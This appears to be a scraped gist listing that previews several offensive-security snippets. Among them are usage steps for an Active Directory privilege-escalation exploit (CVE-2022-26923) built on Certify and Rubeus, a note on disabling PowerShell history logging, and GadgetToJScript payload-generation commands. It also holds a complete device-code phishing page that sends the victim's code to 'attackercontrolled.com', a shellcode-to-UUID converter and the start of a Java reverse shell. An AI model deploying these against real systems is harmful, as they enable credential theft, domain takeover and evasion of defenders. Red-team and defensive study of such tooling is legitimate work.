This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923) | |
// Author: @domchell - MDSec | |
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account | |
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :) | |
// Steps: | |
// 1. Escalate on any workstation (hint: krbrelayup ftw) | |
// 2. Execute UpdateMachineAccount.exe as SYSTEM | |
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp | |
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-DirectoryContent { | |
<# | |
.SYNOPSIS | |
Function to get directory content | |
.EXAMPLE | |
Get-DirectoryContent -Path "C:\" -HeaderName "poshserver.net" -RequestURL "http://poshserver.net" -SubfolderName "/" | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//All credit goes to Ysoserial.net and the great @tiraniddo | |
//Snippets copied from ysoserial.net | |
//https://thewover.github.io/Mixed-Assemblies/ - Great read! | |
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read | |
using System; | |
using System.Collections.Generic; | |
using System.Runtime.Serialization.Formatters.Binary; | |
using System.IO; | |
using System.Reflection; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Logs are held by default in the user profile: | |
\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt | |
this directory also hosts per-application logs | |
-------------------------------------------------------------- | |
Disable Logging... | |
remove-module psreadline |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import smtplib | |
from email.mime.text import MIMEText | |
from email.mime.multipart import MIMEMultipart | |
from email.mime.text import MIMEText | |
from email.mime.base import MIMEBase | |
from email import encoders | |
import ssl | |
import email | |
import argparse |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Command to generate HTA code using GadgetsToJScript | |
GadgetToJScript.exe -w hta | |
# Command to generate JS code using GadgetsToJScript | |
GadgetToJScript.exe -w js | |
# Command to generate VBS code using GadgetsToJScript | |
GadgetToJScript.exe -w vbs | |
# Command to generate VBA code using GadgetsToJScript |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Upload | |
&{ | |
$ErrorActionPreference = 'Stop' | |
$AWSRegion = "us-east-1" | |
$AWSAccessKeyId = "TODO: Access Key" | |
$AWSSecretAccessKey = "TODO: Secret Access Key" | |
$BucketName = "TODO: Bucket Name" | |
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null | |
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog | |
$OpenFileDialog.ShowDialog() | Out-Null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- This page can be formatted to look like something more interesting --> | |
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> | |
<script> | |
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) { | |
$.get("https://attackercontrolled.com/?id=" + data.device_code); | |
document.write(data.message); | |
}); | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from uuid import UUID | |
import os | |
import sys | |
# Usage: python3 binToUUIDs.py shellcode.bin [--print] | |
print(""" | |
____ _ _______ _ _ _ _ _____ _____ | |
| _ \(_) |__ __| | | | | | | |_ _| __ \ | |
| |_) |_ _ __ | | ___ | | | | | | | | | | | | |___ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Not sure where I originally got this from. | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.io.OutputStream; | |
import java.net.Socket; | |
public class C { | |
public C() throws Exception { | |
String host="10.0.0.90"; |